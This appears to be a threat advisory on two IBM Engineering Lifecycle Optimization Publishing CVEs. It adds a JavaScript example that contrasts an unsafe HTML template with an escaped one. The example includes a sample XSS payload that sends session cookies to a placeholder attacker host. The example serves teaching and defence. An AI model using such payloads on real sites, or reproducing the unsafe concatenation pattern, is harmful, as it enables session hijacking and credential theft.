Rewterz Threat Advisory – CVE-2022-34169 – Apache Xalan Java XSLT library Vulnerability
July 20, 2022
Rewterz Threat Alert – APT MustangPanda – Active IOCs
July 20, 2022
Severity
Medium
Analysis Summary
CVE-2021-39016 (CVSS: 4.3)
IBM Engineering Lifecycle Optimization – Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 does not sufficiently monitor or control the volume of network traffic it transmits. An actor can therefore cause the software to transmit more traffic than should be permitted for that actor.
CVE-2021-39015 (CVSS: 5.4)
IBM Engineering Lifecycle Optimization – Publishing 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. The flaw allows users to embed arbitrary JavaScript code in the Web UI, altering its intended functionality and potentially disclosing credentials within a trusted session.
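The class of flaw behind CVE-2021-39015, shown as an added illustration that is not code from IBM Engineering Lifecycle Optimization Publishing or from this advisory: a web UI that concatenates a user-supplied value straight into HTML, beside the same template with contextual output encoding applied. The "report title" field, the page template, the attacker host and the sample payload are all constructed for this example.

```javascript
// Added example of stored/reflected XSS in a web UI and its hardened form.
// Not IBM ELO Publishing code; the template, field name and payload are constructed.

// Constructed payload: an image tag whose error handler exfiltrates the
// session cookie. The attacker host is hypothetical.
const CONSTRUCTED_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: user-controlled text is concatenated directly into HTML,
// so any markup inside the value is parsed and executed by the browser.
function renderTitleUnsafe(title) {
  return `<h1 class="report-title">${title}</h1>`;
}

// Contextual output encoding for an HTML text node: the characters that can
// open a tag, close a tag, or break out of an attribute value are replaced by
// entity references, so the browser shows them as text instead of parsing them.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: identical template, but the value is encoded on output.
function renderTitleSafe(title) {
  return `<h1 class="report-title">${escapeHtml(title)}</h1>`;
}

// Check used to compare the two renderings: after stripping the fixed <h1>
// wrapper, does the user-controlled part still contain a raw tag opener
// ("<" followed by a letter, "!" or "/") that the browser would parse?
function containsRawTag(html) {
  const inner = html.replace(/^<h1[^>]*>/, '').replace(/<\/h1>$/, '');
  return /<[a-z!/]/i.test(inner);
}

// Usage: renderTitleUnsafe(CONSTRUCTED_PAYLOAD) keeps the <img ... onerror>
// intact; renderTitleSafe(CONSTRUCTED_PAYLOAD) yields only &lt;img ...&gt; text.
```

The encoding must match the output context: `escapeHtml` is correct for text nodes and double-quoted attribute values, but a value placed inside a `<script>` block, a URL, or an inline event handler needs a different encoder, and a template engine with auto-escaping (or setting `textContent` instead of `innerHTML` on the client) removes the per-call-site burden entirely.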
Impact
- Security Bypass
- Cross-Site Scripting
Indicators Of Compromise
CVE
- CVE-2021-39016
- CVE-2021-39015
Affected Vendors
IBM
Affected Products
- IBM Engineering Lifecycle Optimization Publishing 6.0.6
- IBM Engineering Lifecycle Optimization Publishing 6.0.6.1
- IBM Engineering Lifecycle Optimization Publishing 7.0
- IBM Engineering Lifecycle Optimization Publishing 7.0.1
- IBM Engineering Lifecycle Optimization Publishing 7.0.2
Remediation
Refer to the IBM Security Bulletin for patch, upgrade or suggested workaround information.